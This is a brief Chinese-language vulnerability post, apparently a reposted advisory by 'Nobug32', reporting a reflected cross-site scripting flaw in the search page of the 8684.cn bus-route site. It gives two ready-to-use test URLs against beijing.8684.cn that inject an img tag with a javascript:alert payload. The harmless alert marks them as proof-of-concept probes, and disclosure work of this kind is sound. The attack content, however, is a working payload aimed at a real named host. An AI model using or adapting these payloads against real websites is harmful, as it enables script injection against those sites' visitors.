注册
登录
| 关键词: 程序 8684 漏洞 CN 严格 攻击 直接 公交 beijing Nobug32 |
作者:Nobug32 首发:Tosec.CN 受影响的版本:仅限8684.CN类似公交程序 描述:程序查询的时候没有经过严格过来,直接导致跨站漏洞的产生攻击测试代码 http://beijing.8684.cn/so.php?k=pp&q=test"><img%20src=javascript:alert(/xss/)%20/><"测试攻击站点 http://beijing.8684.cn/so.php?k=pp&q=test"><img%20src=javascript:alert(/www.tosec.cn/)%20/><" |
|
声明:文章版权归原作者所有 部分文章转自互联网 如有侵权请联系
[邮箱地址] 删除
|
